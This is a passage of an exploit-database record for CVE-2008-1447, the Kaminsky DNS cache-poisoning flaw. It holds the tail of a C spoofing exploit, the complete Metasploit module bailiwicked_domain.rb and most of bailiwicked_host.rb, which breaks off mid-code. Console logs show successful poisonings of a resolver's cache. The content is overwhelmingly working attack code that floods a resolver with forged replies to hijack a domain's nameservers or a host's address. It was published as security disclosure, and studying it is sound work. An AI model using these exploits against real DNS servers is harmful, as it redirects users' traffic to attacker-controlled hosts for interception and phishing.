(ip_send(iph, buf, len) != len)\r\n err(1, "ip_send");\r\n // give the resolver enough time to forward the query and be in a state\r\n // where it waits for answers; sleeping 10ms here limits the number of\r\n // attempts to 100 per sec\r\n usleep(10000);\r\n // send spoofed replies, each reply contains:\r\n // - 1 query: query for the "random hostname"\r\n // - 1 answer: "random hostname" A 1.1.1.1\r\n // - 1 authoritative nameserver: <domain> NS <subhost>.<domain>\r\n // - 1 additional record: <subhost>.<domain> A <any-ip>\r\n snprintf(ns, sizeof (ns), "%s.%s", subhost, domain);\r\n unsigned r;\r\n for (r = 0; r < replies; r++)\r\n {\r\n // use a txid that is just 'r': 0..(replies-1)\r\n len = build_response(buf, ip_authoritative, ip_resolver,\r\n port_resolver, r, name, "1.1.1.1", domain, ns, anyip);\r\n if (ip_send(iph, buf, len) != len)\r\n err(1, "ip_send");\r\n }\r\n cnt++;\r\n }\r\n ip_close(iph);\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9178", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:07", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_domain.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68473", "href": "https://packetstormsecurity.com/files/68473/bailiwicked_domain.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0003 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_domain.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious nameserver \nentry into the target nameserver which replaces the legitimate \nnameservers for the target domain. By causing the target nameserver to \nquery for random hostnames at the target domain, the attacker can spoof \na response to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. This insertion completely replaces the original nameserver \nrecords for the target domain. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n## ### ## ## \n## ## #### ###### #### ##### ##### ## #### ###### \n####### ## ## ## ## ## ## ## ## ## ## ### ## \n####### ###### ## ##### #### ## ## ## ## ## ## ## \n## # ## ## ## ## ## ## ##### ## ## ## ## ## \n## ## #### ### ##### ##### ## #### #### #### ### \n## \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 73 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_domain \nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D \nRHOST => A.B.C.D \nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com \nDOMAIN => example.com \nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com \nNEWDNS => dns01.metasploit.com \nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0 \nSRCPORT => 0 \nmsf auxiliary(bailiwicked_domain) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] >> ADDRESS: A.B.C.D PORT: 50391 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \nb.iana-servers.net. \na.iana-servers.net. \n \nmsf auxiliary(bailiwicked_domain) > run \n[*] Switching to target port 50391 based on Metasploit service \n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. \n[*] Querying recon nameserver for address of b.iana-servers.net.... \n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 \n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... \n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. \n[*] Querying recon nameserver for address of a.iana-servers.net.... \n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 \n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... \n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Sent 8000 queries and 160000 spoofed responses... \n[*] Sent 9000 queries and 180000 spoofed responses... \n[*] Sent 10000 queries and 200000 spoofed responses... \n[*] Sent 11000 queries and 220000 spoofed responses... \n[*] Sent 12000 queries and 240000 spoofed responses... \n[*] Sent 13000 queries and 260000 spoofed responses... \n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com \n[*] Auxiliary module execution completed \n \nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D \n[*] exec: dig +short -t ns example.com @A.B.C.D \n \ndns01.metasploit.com. \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Domain Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target \ndomains nameserver entries in a vulnerable DNS cache server. This attack works \nby sending random hostname queries to the target DNS server coupled with spoofed \nreplies to those queries from the authoritative nameservers for that domain. \nEventually, a guessed ID will match, the spoofed packet will get accepted, and \nthe nameserver entries for the target domain will be replaced by the server \nspecified in the NEWDNS option of this exploit. \n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5590 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), \nOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \ndomain = datastore['DOMAIN'] + '.' \nnewdns = datastore['NEWDNS'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nnewttl = datastore['TTL'].to_i \nxidbase = rand(20001) + 20000 \n \naddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\") \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already poisoned \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \n \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nt = Time.now + ttl \nprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\") \nprint_status(\" Cache entry expires on #{t.to_s}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \n \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) \nreq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored \nreq.qr = 1 \nreq.aa = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(domain, Resolv::DNS::Resource::IN::NS) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == domain and data.name.to_s == newdns) \nprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68473/bailiwicked_domain.rb.txt"}, {"lastseen": "2016-12-05T22:20:49", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_host.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68471", "href": "https://packetstormsecurity.com/files/68471/bailiwicked_host.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0002 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_host.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious host entry \ninto the target nameserver. By causing the target nameserver to query \nfor random hostnames at the target domain, the attacker can spoof a \nresponse to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n_ _ _ _ \n| | | | (_) | \n_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ \n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __| \n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_ \n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__| \n| | \n|_| \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 72 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_host \nmsf auxiliary(bailiwicked_host) > show options \n \nModule options: \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nHOSTNAME pwned.example.com yes Hostname to hijack \nNEWADDR 1.3.3.7 yes New address for hostname \nRECONS 208.67.222.222 yes Nameserver used for reconnaissance \nRHOST yes The target address \nSRCPORT yes The target server's source query port (0 for automatic) \nXIDS 10 yes Number of XIDs to try for each query \n \nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D \nRHOST => A.B.C.D \n \nmsf auxiliary(bailiwicked_host) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \n \nmsf auxiliary(bailiwicked_host) > set SRCPORT 0 \nSRCPORT => 0 \n \nmsf auxiliary(bailiwicked_host) > run \n[*] Switching to target port 48178 based on Metasploit service \n[*] Targeting nameserver A.B.C.D \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got answer with 2 answers, 0 authorities \n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com. \n[*] Querying recon nameserver for address of ns89.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45 \n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com.... \n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com. \n[*] Querying recon nameserver for address of ns90.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45 \n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com.... \n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7 \n[*] Auxiliary module execution completed \nmsf auxiliary(bailiwicked_host) > \n \nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D \n[*] exec: nslookup pwned.example.com A.B.C.D \n \nServer: A.B.C.D \nAddress: A.B.C.D#53 \n \nNon-authoritative answer: \nName: pwned.example.com \nAddress: 1.3.3.7 \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Host Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single \nmalicious host entry into the target nameserver by sending random sub-domain \nqueries to the target DNS server coupled with spoofed replies to those \nqueries from the authoritative nameservers for the domain which contain a \nmalicious host entry for the hostname to be poisoned in the authority and \nadditional records sections. Eventually, a guessed ID will match and the \nspoofed packet will get accepted, and due to the additional hostname entry \nbeing within bailiwick constraints of the original request the malicious host \nentry will get cached. \n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5585 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], \n], \n'Privileged' => true, \n'Targets' => \n[ \n[\"BIND\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n}, \n], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), \nOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \nhostname = datastore['HOSTNAME'] + '.' \naddress = datastore['NEWADDR'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nttl = datastore['TTL'].to_i \nxidbase = rand(4)+2*10000 \n \ndomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0] \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already cached \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nt = Time.now + ttl \nprint_status(\"Failure: This hostname is already in the target cache: #{name} == #{address}\") \nprint_status(\" Cache entry expires on #{t.to_s}... sleeping.\") \ncached = true \nsleep ttl \nend \nend \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil 